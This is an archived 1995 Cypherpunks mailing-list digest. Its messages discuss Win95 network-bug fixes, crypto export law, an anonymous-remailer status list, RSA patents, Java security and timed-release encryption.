The Win95 product manager let me know yesterday that they'd corrected some of the errors on their Web server. I'm sure Microsoft is planning to publicize the changes in greater detail, so I'll just summarize them here.

Load the original security bugfix news release at gopher://quixote.stanford.edu/0R1271897-1279147-/win95netbugs side-by-side with the corrected version now at http://www.microsoft.com/windows/software/w95fpup.htm to see the changes.

Notable corrections are:

1. Microsoft has retracted the puzzling allegation that SMBCLIENT sends "illegal commands" across the network.

2. Microsoft is now a bit more forthright in acknowledging that the problem applies to all language versions of Win95.

They didn't change the date, and they still say that Samba is shareware. And they still fail to give proper credit to the third parties that actually found the problems for Microsoft. Oh well, can't have everything.

Microsoft has also promised that localized (foreign-language) versions of the "updated files that address the issue" will be made available within two weeks. I still don't understand what the hold-up is, but a time frame is good.

In addition, Microsoft is reconsidering the position of the NE4100 and certain NE2000-compatible PCMCIA cards like the EFA-207 on the hardware compatibility list because, well, they aren't.
Yusuf has given his imprimatur of Official Microsoft Response to the discussion of the well-known IPX SAP routing and security issue saved at gopher://quixote.stanford.edu/0R161799-178969-/win95netbugs. Previously this had only been posted with the "speaking only for myself" disclaimer. Microsoft had acknowledged only the specific "server name conflict issue" covered by PC Week, not the underlying general problem that has been widely discussed on Usenet. Maybe we'll get a good article into the Knowledge Base now.

I'm still hoping they'll document the known and acknowledged ProviderPath problem with wsock32.dll. Progress comes slowly.

-rich

From rsalz at osf.org Mon Nov 13 04:42:41 1995
From: rsalz at osf.org (Rich Salz)
Date: Mon, 13 Nov 1995 20:42:41 +0800
Subject: Pegasus Mail
Message-ID: <9511091252.AA04699@sulphur.osf.org>

I sure hope someone tells David Harris that his program is now export controlled. From my reading of his message, it seemed like he thinks he "beat the system" because he didn't include actual crypto code.

Software that says "plug your own crypto here" is considered an ancillary device according to the ITAR. Or, as I heard some NSA people call it, "the classic 'crypto with a hole'." Seems kinda silly that the hole is the crypto, but hey that ancillary device clause, you just gotta love it.

If Pegasus mail were written to support generic user-loadable content transforms, that would be different. But even then, you have to be careful how that's done. If you just did some global search-and-replace and came up with "keyed compression" you wouldn't get past anyone. But if you had an opaque state block that the user modules could set/use/clear, and you passed that along with your in/out buffers, then you'd be safe. Of course, they'd know what is really going on, but are powerless to prevent it.
/r$

From ac at hawk.twinds.com Mon Nov 13 04:53:48 1995
From: ac at hawk.twinds.com (Arley Carter)
Date: Mon, 13 Nov 1995 20:53:48 +0800
Subject: Information Resource Engineering Inc.
Message-ID:

I'm looking for information about encryption products made by this company. Any pointers will be appreciated.

Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac at hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from ."

From rah at shipwright.com Mon Nov 13 05:59:36 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Mon, 13 Nov 1995 21:59:36 +0800
Subject: (fwd) Digital Signature Patent
Message-ID:

For those as get Info Week...

Cheers,
Bob Hettinga

--- begin forwarded text

Mime-Version: 1.0
Date: Mon, 13 Nov 1995 08:08:47 -0500
To: rah at shipwright.com
Subject: Digital Signature Patent

for your information...

-----------------------------------------------------------------------
RSA WANTS LICENSE FOR DIGITAL SIGNATURE TECHNOLOGY

RSA Data Security claims it owns the dominant patent covering digital signature technology, and wants other companies and government agencies to pay them license fees for using it. The U.S. government is fighting RSA's claim, saying the digital signature algorithm it uses in its digital signature standard is covered by a different patent. If RSA can make its claim stick, the government will owe the encryption company royalties for use of its digital signature standard.

source: Information Week 13 Nov 95 p20 via edupage

--- end forwarded text

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional."
--Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From raph at CS.Berkeley.EDU Mon Nov 13 07:14:05 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Mon, 13 Nov 1995 23:14:05 +0800
Subject: List of reliable remailers
Message-ID: <199511131450.GAA15424@kiwi.cs.berkeley.edu>

I operate a remailer pinging service which collects detailed information about remailer features and reliability.

To use it, just finger remailer-list at kiwi.cs.berkeley.edu

There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

For the PGP public keys of the remailers, finger pgpkeys at kiwi.cs.berkeley.edu

This is the current info:

REMAILER LIST

This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu.

$remailer{"extropia"} = " cpunk pgp special";
$remailer{"portal"} = " cpunk pgp hash";
$remailer{"alumni"} = " cpunk pgp hash";
$remailer{"bsu-cs"} = " cpunk hash ksub";
$remailer{"c2"} = " eric pgp hash reord";
$remailer{"penet"} = " penet post";
$remailer{"ideath"} = " cpunk hash ksub reord";
$remailer{"hacktic"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = " cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = " cpunk pgp hash filter";
$remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"syrinx"} = " cpunk pgp hash cut reord mix post";
$remailer{"ford"} = " cpunk pgp hash ksub";
$remailer{"vishnu"} = " cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = " cpunk hash mix";
$remailer{"replay"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = " cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = " mix cpunk pgp hash latent cut";
$remailer{"ecafe"} = " cpunk mix";
$remailer{"wmono"} = " cpunk mix pgp. hash latent cut ek";
catalyst at netcom.com is _not_ a remailer.
lmccarth at ducie.cs.umass.edu is _not_ a remailer.
usura at replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(robo syrinx c2)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys at kiwi.cs.berkeley.edu" to get PGP keys for the remailers. Fingering this address works too.

remailer  email address                      history        latency  uptime
-----------------------------------------------------------------------
mix       mixmaster at remail.obscura.com    -----------    1:32:59  99.95%
ideath    remailer at ideath.goldenbear.com  -_.--------    5:58:20  99.94%
rmadillo  remailer at armadillo.com          +++ ++++++++     39:25  99.92%
penet     anon at anon.penet.fi              ---+-------    6:09:10  99.86%
ecafe     cpunk at remail.ecafe.org          #*#*# #--*+*     38:11  99.86%
alumni    hal at alumni.caltech.edu          *+*--***+* *     13:43  99.63%
wmono     wmono at valhalla.phoenix.net      ****++-++* *     17:07  99.62%
replay    remailer at replay.com             **+**+*++* *     11:27  99.60%
vishnu    mixmaster at vishnu.alias.net      **-*+*+ **+*     14:30  99.38%
robo      robo at c2.org                     #*#*####** *      4:30  99.26%
hacktic   remailer at utopia.hacktic.nl      **+**+**** *     10:30  99.26%
spook     remailer at valhalla.phoenix.net   *****+-++* *     23:14  99.25%
flame     remailer at flame.alias.net        + +**++*** *     20:38  99.21%
portal    hfinney at shell.portal.com        #**--+#* *       13:15  99.08%
bsu-cs    nowhere at bsu-cs.bsu.edu          *##++ ##** *      7:53  99.01%
c2        remail at c2.org                   * -++++++        45:17  96.60%
ford      remailer at bi-node.zerberus.de    _ . _ _-      53:08:59  93.60%
rahul     homer at rahul.net                 +-**----**+*     15:00  99.98%
extropia  remail at extropia.wimsey.com      .--..-*       11:56:59  84.16%
syrinx    syrinx at c2.org                   --++++-+- +    7:07:35  79.75%

History key
* # response in less than 5 minutes.
* * response in less than 1 hour.
* + response in less than 4 hours.
* - response in less than 24 hours.
* . response in more than 1 day.
* _ response came back too late (more than 2 days).

cpunk
    A major class of remailers. Supports Request-Remailing-To: field.
eric
    A variant of the cpunk style. Uses Anon-Send-To: instead.
penet
    The third class of remailers (at least for right now). Uses X-Anon-To: in the header.
pgp
    Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID.
hash
    Supports ## pasting, so anything can be put into the headers of outgoing messages.
ksub
    Remailer always kills subject header, even in non-pgp mode.
nsub
    Remailer always preserves subject header, even in pgp mode.
latent
    Supports Matt Ghio's Latent-Time: option.
cut
    Supports Matt Ghio's Cutmarks: option.
post
    Post to Usenet using Post-To: or Anon-Post-To: header.
ek
    Encrypt responses in reply blocks using Encrypt-Key: header.
special
    Accepts only pgp encrypted messages.
mix
    Can accept messages in Mixmaster format.
reord
    Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself.
mon
    Remailer has been known to monitor contents of private email.
filter
    Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering.

Raph Levien

From perry at piermont.com Mon Nov 13 07:41:34 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 13 Nov 1995 23:41:34 +0800
Subject: Market Value of Web Pages
In-Reply-To: <199511130435.UAA08914@jobe.shell.portal.com>
Message-ID: <199511130509.AAA00319@jekyll.piermont.com>

anonymous-remailer at shell.portal.com writes:
> As an example, I'm presently preparing an unsolicited Security Review
> report for a Fortune 500 company. It's *priced* if you will in the mid
> five figure range per page (and that includes the title page, the
> appendices, and the pages which say on them, "this page left intentionally
> blank").

What a ripoff. I'm preparing a solicited security report for a Fortune 500 copy right now. I'm writing it at my usual rate -- which is exorbitantly high, but not so high that I'm charging them five figures an hour to write the thing, and I can't imagine needing an hour per page, including the title and other pages.
Perry

From pkoning at chipcom.com Mon Nov 13 07:49:41 1995
From: pkoning at chipcom.com (Paul Koning 1695)
Date: Mon, 13 Nov 1995 23:49:41 +0800
Subject: POTP Security
Message-ID: <30A78DA4@mailer2>

> From: Paul Jackman
>Newgroups: talk.politics.crypto
> Subject: Re: Elementrix One-Time Pad
>..
> The algorithm will be published when patent protection is assured.
> It is currently patent pending in several countries.

I saw that comment earlier. It's rather a curious statement, given that the rule of publication vs. patents is that publication before FILING kills your ability to get the patent (in most countries) whereas publication after filing but before grant is not an issue at all.

This explains why you often see a mad scramble in companies when something patentable is about to be announced at a trade show, or explained in a white paper... the filing has to be in the mail before that happens. But only just before... whether the patent office takes days or years to grant the patent doesn't matter.

paul

From s1113645 at tesla.cc.uottawa.ca Mon Nov 13 08:16:11 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Tue, 14 Nov 1995 00:16:11 +0800
Subject: [joke] Re: Who needs time vaults anyway?
In-Reply-To:
Message-ID:

Tasteless joke. Do not take seriously.

On Sat, 11 Nov 1995, Robert Hettinga wrote:

> What's that to keep that from happening on the net, just like our much
> maligned (guy's gotta make a living, fer chrissake!) assassination-payoff
> escrow agent...

Oh you must mean those wily hackers at Digicrime. Way to go Matt. My server originally had trouble looking up the host; must have been some last-ditch effort by those spooks at SAIC (I did note some recent obituaries and resignations on their board, heheh...). It's all fine now though.

Excellent means of gaining employment and weapons practice. Gives new meaning to the phrase "affirmative action hiring". (though I still haven't seen my last check in the mail, guys. Hint, hint, hint.)

Just wondering, does the company presently have a market quote for captive CS profs? (shaddup over there! stop counting primes already)

Looking forward to the forthcoming Blacknet Unspeakable Comm-Oddities Exchange (a rather nice slant on AMIX, eh?). (still selling those babies, Tim?)

From cme at TIS.COM Mon Nov 13 08:19:42 1995
From: cme at TIS.COM (Carl Ellison)
Date: Tue, 14 Nov 1995 00:19:42 +0800
Subject: Diffie-Hellman in GF(2^n)?
In-Reply-To: <199511130525.VAA21438@comsec.com>
Message-ID: <9511131548.AA24703@tis.com>

>From: David A Wagner
>Date: Sun, 12 Nov 1995 14:43:53 -0800 (PST)

>``Hence the fields GF(2^n) out to be avoided in all cryptographic
>applications.''

I wonder what this implies about elliptic curve applications over GF(2^n)...

From trei at process.com Mon Nov 13 08:22:28 1995
From: trei at process.com (Peter Trei)
Date: Tue, 14 Nov 1995 00:22:28 +0800
Subject: Lotus Notes RSA Implementation Question
Message-ID: <9511131552.AA04995@toad.com>

> >1) What is the key size used by the USA licensed version?

Charlie Kaufmann goes into moderate detail on Lotus Note's encryption scheme in "Network Security: Private communication in a public world"

Each user has both strong (~512 bit) and weak (~400 bit) RSA keys. These, and strong (64 bit) or weak (40 bit) symmetrical session keys are used depending on the location of the users.

Peter Trei
Senior Software Engineer
Purveyor Development Team
Process Software Corporation
http://www.process.com
trei at process.com

From tien at well.sf.ca.us Mon Nov 13 09:29:00 1995
From: tien at well.sf.ca.us (Lee Tien)
Date: Tue, 14 Nov 1995 01:29:00 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <199511131617.IAA28561@well.com>

I realize I'm a little late in this thread, but I'm pretty far behind in my e-mail. I oversimplify here, but what's new.
Anyway, all I wanted to say is that treaties are *not* superior to acts of Congress, as far as I know (they do override state law).

I'm not an international lawyer, but it was held long ago that a properly ratified treaty is "equivalent to an act of the legislature." Foster v. Neilson, 27 U.S. (2 Pet.) 253, 314 (1829) (Marshall, C.J.).

Note also that a treaty is not necessarily self-executing; if it requires appropriation of funds, Congress needs to act again. Whether Congress may decline to implement is unclear.

Finally, the Supreme Court has also held that when there is conflict between an Act of Congress and a treaty, "the last expression of the sovereign will must control." The Chinese Exclusion Case, 130 U.S. 581 (1889).

Treaties may still bind the U.S. internationally, putting the U.S. in default. But a U.S. person would not be able to enforce any treaty-based claim if a later U.S. law conflicts, at least in a U.S. court.

Lee

P.S. I'm not aware of telecom treaties that would shield one from ITAR violations, but would be interested to know of any. I generally refrain from public comment on ITAR because we are in litigation, as most of you know.

Perry wrote:
>"Peter D. Junger" writes:
>> : I understand that you are a lawyer and I'm not, but it is my
>> : understanding that international treaties come in to play on this sort
>> : of thing. For instance, in international shipments, you can transship
>> : items and substances that are illegal to possess in a country through
>> : its ports provided that the materials do not originate or terminate
>> : their shipment in the country and remain sealed in their containers
>> : throughout. It is also my understanding that items like mail and phone
>> : calls that happen to transit a country are not necessarily subject to
>> : that nations laws provided that the nation is not a terminal point for
>> : the mail or call or what have you.
>>
>> The trouble is that the ITAR's definition of export that is relevant
>> to cryptographic software has nothing to do with exporting in the
>> normal sense, and therefore it has nothing to do with transhipments.
>
>I am starting to have trouble believing you are a lawyer. Are you
>actually telling me that treaties which explicitly indemnify
>transshipment customers against local laws are superseded by lower
>level laws, in spite of the supremacy clause of the constitution? That
>might be what the state department would tell you, but I'd have
>trouble believing even a lobotomized mongoloid judge would let that
>stand. Treaties are treaties, period.
>
>Perry

From tien at well.sf.ca.us Mon Nov 13 09:45:05 1995
From: tien at well.sf.ca.us (Lee Tien)
Date: Tue, 14 Nov 1995 01:45:05 +0800
Subject: The Crypto Applications we would rather not talk about
Message-ID: <199511131617.IAA28486@well.com>

> Anonymous remailer and PGP
> Unusual applications
>
>I don't know if anyone else caught it last year
>but High Times discovered anonymous remailers
>and PGP for an article last year for
>anonymous remote control of grow rooms.
>

Actually, the NYT Magazine did a cover story on pot growing within the last year, and toward the end one of the Americans doing grow rooms in Holland said specifically that he was looking toward anonymous electronic communications as a way to control his grow rooms remotely and securely.

Lee

From rjc at clark.net Mon Nov 13 09:51:05 1995
From: rjc at clark.net (Ray Cromwell)
Date: Tue, 14 Nov 1995 01:51:05 +0800
Subject: Java insecurity - long - argumentative - you are warned.
In-Reply-To: <199511092241.OAA14102@jobe.shell.portal.com>
Message-ID: <199511131603.LAA21075@clark.net>

>
> On Mon, 6 Nov 1995, Ray Cromwell wrote:
>
> > > WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS
> > > A FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED!
> > >
> > > >From the Java Web pages (as combined in Firewalls/BoS):
> > >
> > > > The language's security features (not just applets):
> >
> > [Long list of bullshit deleted]
>
> I don't think that this is *bullshit* ... the questions I mean ... but,
> I for one am tired of people promoting products in a manner which flies
> in direct contravention of expert consensus.

Dr Cohen could have answered the questions himself if he had read the literature. What he did was equivalent to asking "how secure is DES" based on a marketing information flyer. Java does not fly in direct contravention of expert consensus. Java does not purport to solve the halting problem or formally prove the correctness of algorithms. The only phrase you can quibble with is "tamper-free/virus-free", but how many products on the market make that claim, for instance, over-the-counter drugs? Anyone with half a brain knows that nothing is perfectly secure, and what those phrases really mean is "tamper-resistant". So get over it.

It seems that after all those Netscape bugs were found, now folks, many of whom I consider to not be very skilled in computer science, are trying to conduct a witch hunt against Netscape, it seems in the hope of gaining some fame or recognition. The general tone of your messages and Dr Cohen's, leads me to believe that you think you are conducting some service by "exposing" these "flaws", thinking that one day c'punks will recognize your contribution and thank you. My guess is that most c'punks view your analysis as content free, and overly zealous/hostile.

-Ray

From m.landicho at biology.bbk.ac.uk Mon Nov 13 09:57:35 1995
From: m.landicho at biology.bbk.ac.uk (Mary Rose)
Date: Tue, 14 Nov 1995 01:57:35 +0800
Subject: unsuscribe
Message-ID:

unsuscribe

From bianco at itribe.net Mon Nov 13 10:16:10 1995
From: bianco at itribe.net (David J. Bianco)
Date: Tue, 14 Nov 1995 02:16:10 +0800
Subject: The Crypto Applications we would rather not talk about
In-Reply-To: <199511131617.IAA28486@well.com>
Message-ID: <199511131737.MAA17729@gatekeeper.itribe.net>

On Nov 13, 9:21, Lee Tien sent the following to the NSA's mail archives:
> Subject: Re: The Crypto Applications we would rather not talk about
||
|| Actually, the NYT Magazine did a cover story on pot growing within the last
|| year, and toward the end one of the Americans doing grow rooms in Holland
|| said specifically that he was looking toward anonymous electronic
|| communications as a way to control his grow rooms remotely and securely.
||

If the story were about how pot growers used locks on their doors to keep people out, I doubt very many people would care. The mere fact that a computer is involved in some way turns on the hype buttons of many journalists who would otherwise find the story unremarkable.

David

--
==========================================================================
David J. Bianco                | Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.                   | Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center | email:
Norfolk, VA 23510              | URL : http://www.itribe.net/~bianco/

From m.landicho at biology.bbk.ac.uk Mon Nov 13 10:43:28 1995
From: m.landicho at biology.bbk.ac.uk (Mary Rose)
Date: Tue, 14 Nov 1995 02:43:28 +0800
Subject: unsuscribe all news groups
Message-ID:

I wish to unsuscribe to all news groups as I feel I should be on a different planet.
Could somebody notify all newsgroups on on my behalf please.

Sincerely yours

From jcobb at ahcbsd1.ovnet.com Mon Nov 13 10:57:43 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Tue, 14 Nov 1995 02:57:43 +0800
Subject: New World Encryption
Message-ID:

Friend,

An item in 11 09 95 Edupage summarizes a NY Times news story revealing Clinton's wish to spy on the world:

OPPOSITION TO ADMINISTRATION'S ENCRYPTION STAND

A coalition of 37 major U.S. technology companies has rejected the
Clinton Administration's proposed standard for data encryption,
saying that they found Administration officials unwilling to
compromise. The government wants an encryption plan that will
allow it to gather intelligence overseas, through the use of a key
                                ^^^^^^^^
escrow encryption system. The high-tech companies want an
encryption standard that
would ensure privacy for both domestic and overseas users.
                         ^^^^              ^^^^^^^^
(New York Times 8 Nov 95 C3)

Their opposition to the Administration's plan has been joined by 12
conservative organizations who call it anti-consumer,
anti-marketplace, and anti-progress. (New York Times 9 Nov 95 C3)

Cordially,

Jim

NOTE. To subscribe to Edupage: send a message to:

listproc at educom.unc.edu

and in the body of the message type:

subscribe edupage

From perry at alpha.jpunix.com Mon Nov 13 11:08:09 1995
From: perry at alpha.jpunix.com (John Perry)
Date: Tue, 14 Nov 1995 03:08:09 +0800
Subject: Current list of Remailers
Message-ID: <199511110131.TAA00538@alpha.jpunix.com>

Hello Everyone,

Since Raph announced his new Type-II remailer list, I just wanted to let everyone know that I have updated the type2.list and pubring.mix files on jpunix.com to reflect the most up-to-date status of the Type-II Mixmaster remailers. You can connect to http://www.jpunix.com or ftp to ftp.jpunix.com to get the latest configuration files.

John Perry - KG5RG - perry at alpha.jpunix.com - PGP-encrypted e-mail welcome!
Packet Radio - KG5RG at WA4IMZ.#SETX.TX.USA.NA
WWW - http://www.jpunix.com
PGP 2.62 key for perry at jpunix.com is on the keyservers.

From bianco at itribe.net Mon Nov 13 11:12:17 1995
From: bianco at itribe.net (David J. Bianco)
Date: Tue, 14 Nov 1995 03:12:17 +0800
Subject: New feature for the Cryptography Technical Report Server
Message-ID: <199511131840.NAA21640@gatekeeper.itribe.net>

Yes, it's still there!
8-)

I posted a note to this list a few months ago announcing that I had set up such a service, and though we've only got a few reports I'm up to a couple o' hundred visitors a week. To me, the amount of activity indicates interest in the subject, but the lack of reports tells me that either authors are not interested in contributing, it's too difficult to contribute, or they don't know about service.

I took some time this weekend and wrote a script to handle online submissions. This should make things easier on the authors, I think. If you have a technical report, journal article or book you'd like to index in CTRS (abstract only submissions are supported as well as full-text submission), point your browser at:

http://www.itribe.net/CTRS/add-entry.cgi

If you try this, please let me know how you liked it. I'm interested in making the submissions process as painless as possible.

As always, the main CTRS page is http://www.itribe.net/CTRS/ or https://www.itribe.net/CTRS/

--
==========================================================================
David J. Bianco                | Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.                   | Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center | email:
Norfolk, VA 23510              | URL : http://www.itribe.net/~bianco/

From jim at acm.org Mon Nov 13 11:22:33 1995
From: jim at acm.org (Jim Gillogly)
Date: Tue, 14 Nov 1995 03:22:33 +0800
Subject: coding and nnet's
In-Reply-To:
Message-ID: <199511110125.RAA04930@mycroft.rand.org>

> tcmay at got.net (Timothy C. May) writes:
> At 7:52 PM 11/10/95, Bill Stewart wrote:
>>Schneier's 2nd edition says "Neural nets aren't terribly useful for
>>cryptography, primarily because of the shape of the solution space.
>>Neural nets work best for problems that have a continuity of solutions,
>>some better than others. This allows a neural net to learn, proposing
>>better and better solutions as it does. Breaking an algorithm provides
>>for very little in the way of learning opportunities: You either recover
>>the key or you don't. (At least this is true if the algorithm is any
>>good.) Neural nets work well in structured environments when there is
>>something to learn, but not in the high-entropy, seemingly random world of
>>cryptography."
>>And he doesn't give any references.
> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> This paragraph sounds a _lot_ like what I wrote in sci.crypt a while back
> on the usefulness of AI and neural nets for crypto. Sounds almost like
> exactly the paragraph I wrote, in fact.

As it happens, I saved that one, because I thought the "needle standing up from a flat plain" metaphor was so apt; I've used it in a couple of talks without remembering where I got it. Here's your message to sci.crypt:

From: tcmay at netcom.com (Timothy C. May)
Subject: Re: Neural nets & Crypto
Message-Id:
Date: Wed, 10 Aug 1994 17:53:13 GMT

Neural nets are not likely to do well with modern ciphers (e.g., RSA, IDEA, DES, etc.), mainly because of the shape of the solution space. Instead of the "rolling hills and valleys" that neural nets (and related methods, such as genetic algorithms, simulated annealing, etc.) do well in, the solution space for modern ciphers offers very little in the way of "learning" opportunities: you either have the solution (the key), or you don't.

Think of a needle standing up from a flat plain...a NN or any other hill-climber could wander for years and never find it.

I suspect there are uses in peripheral aspects, such as guessing passwords (when people have not picked high-entropy passwords, but have instead used familiar names). Or in traffic analysis.

But the move in modern cryptology is definitely away from using anything with "structure" that can be learned.
Put another way, neural nets and such work well in structured environments, where there's something to _learn_, but not in the high-entropy, seemingly random world of encrypted data.

--Tim May

A subsequent message (which I also saved) dealt with genetic programming and was also interesting.

Jim Gillogly
21 Blotmath S.R. 1995, 01:22

From mark at grondar.za Mon Nov 13 11:24:53 1995
From: mark at grondar.za (Mark Murray)
Date: Tue, 14 Nov 1995 03:24:53 +0800
Subject: unsuscribe all news groups
Message-ID: <199511131855.UAA00152@grumble.grondar.za>

> I wish to unsuscribe to all news groups as I feel I should be on a different planet.
> Could somebody notify all newsgroups on on my behalf please.
>
> Sincerely yours

Please send a one line message containing only

HELP

to majordomo at toad.com to get help on doing this.

M

--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark at grumble.grondar.za for PGP key

From amir at watson.ibm.com Mon Nov 13 11:32:33 1995
From: amir at watson.ibm.com (Amir Herzberg)
Date: Tue, 14 Nov 1995 03:32:33 +0800
Subject: Timed-release crypto - Proactive security plug
In-Reply-To:
Message-ID: <9511131904.AA21605@gimili.watson.ibm.com>

A small note/plug: the schemes by Tim and Michael are based on `long lived' secret sharing, i.e. you trust each share of your secret to a server for a really long time. Some people may be concerned that such a long time would allow an attacker to break into most servers and reconstruct the secret (key).

A solution to this is proactive secret sharing, as described in [HJKY95]. In this protocol, the secret shares are periodically refreshed (i.e. new shares are computed distributively and then the old shares are erased). In this manner, an attacker has to break into most servers during the same period; shares from one period are worthless on the next period.

Best, Amir

[HJKY95] `Proactive Secret Sharing', A. Herzberg, H. Krawczyk, S. Jareski, M. Yung, Crypto 95.

> At 12:09 AM 11/7/95, Michael Shields wrote:
>
> >In the May proposal, when you have a message to be encrypted, you
> >encrypt it with a session key, optionally split that key with an n-of-m
> >scheme, and then send the key into a network of escrow agents, which are
> >instructed to hold the message for a given period of time. You then
> >hold onto the encrypted message, though you need not keep it secret.
> >Conceptually, you have encrypted a message and then remailed the key to
> >yourself in such a way that it will take X length of time to arrive.
>
> --Tim May
>
> Views here are not the views of my Internet Service Provider or Government.

How do you know that? :-)

From m5 at dev.tivoli.com Mon Nov 13 11:59:49 1995
From: m5 at dev.tivoli.com (Mike McNally)
Date: Tue, 14 Nov 1995 03:59:49 +0800
Subject: unsuscribe all news groups
In-Reply-To: <199511131855.UAA00152@grumble.grondar.za>
Message-ID: <9511131928.AA21826@alpha>

Mary Rose wrote:
> > I wish to unsuscribe ...
>
> Please send a one line message ...

Hmm... I was going to suggest asking Yvette.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX      |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From tcmay at got.net Mon Nov 13 12:21:41 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 14 Nov 1995 04:21:41 +0800
Subject: Timed-release crypto - Proactive security plug
Message-ID:

At 7:03 PM 11/13/95, Amir Herzberg wrote:
>A small note/plug: the schemes by Tim and Michael are based on `long lived'
>secret sharing, i.e. you trust each share of your secret to a server for a
>really long time. Some people may be concerned that such a long time would
>allow an attacker to break into most servers and reconstruct the secret (key).
>
>A solution to this is proactive secret sharing, as described in [HJKY95].
>In this protocol, the secret shares are periodically refreshed (i.e. new
>shares are computed distributively and then the old shares are erased).
>In this manner, an attacker has to break into most servers during the same
>period; shares from one period are worthless on the next period.
>
>Best, Amir
>
>[HJKY95] `Proactive Secret Sharing', A. Herzberg, H. Krawczyk, S. Jareski,
>M. Yung, Crypto 95.

I also was sent a copy of Ron Rivest's latest paper on timed-release crypto (also available at the URL http://theory.lcs.mit.edu/~rivest/).

These noted cryptographers, Amir, Ron, and others, are of course doing "real cryptography" on this timed-released stuff....my speculations in '93 and later are informal, rough considerations. There are dangers in using "common sense" in protocols like this, but, then, few of us have the time to explore things in enough detail.

I just wanted to clarify things, though I suspect most of you know that many of my arguments (and those of others, too) are based on informal, bull session, sorts of foundations. This is often enough at a very early stage. No substitute for much more rigorous, published-paper-quality analyses, of course.

>> --Tim May
>>
>> Views here are not the views of my Internet Service Provider or Government.
>
>How do you know that? :-)

In the past, I have actually gotten warning letters from some of my Internet Service Providers saying that my views were inimical to their own views. One provider, who shall remain nameless, actually *turned off* my access to NetNews until I agreed to post a clarification that the views I was expressing were not his views!

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C.
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From j.fletcher at psych.stir.ac.uk Mon Nov 13 12:32:02 1995 From: j.fletcher at psych.stir.ac.uk (Jonathon Fletcher) Date: Tue, 14 Nov 1995 04:32:02 +0800 Subject: Q: Bookshop in Seattle Message-ID: Can someone point me towards a bookshop in Seattle that is likely to have the second edition of Applied Cryptography? Sincerely, -Jon -- Jonathon Fletcher, j.fletcher at stirling.ac.uk From sameer at c2.org Mon Nov 13 12:33:28 1995 From: sameer at c2.org (sameer) Date: Tue, 14 Nov 1995 04:33:28 +0800 Subject: Who needs time vaults anyway? In-Reply-To: <199511110715.AAA21835@nagina.cs.colorado.edu> Message-ID: <199511110843.AAA18344@infinity.c2.org> > Can anyone explain what use this theoretical "time-sensitive" crypto > box would be good for? Suppose you die. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From wilcoxb at nagina.cs.colorado.edu Mon Nov 13 12:38:46 1995 From: wilcoxb at nagina.cs.colorado.edu (Bryce) Date: Tue, 14 Nov 1995 04:38:46 +0800 Subject: Who needs time vaults anyway? Message-ID: <199511110715.AAA21835@nagina.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- I don't really understand the use for "can't be opened until Christmas" tricks. If you don't want anyone to see your info until Christmas then just don't give them a copy until then! If you want to prove that you have it but not let them see it until later then do timestamping of hashes, zero-knowledge proofs and so forth. Can anyone explain what use this theoretical "time-sensitive" crypto box would be good for? 
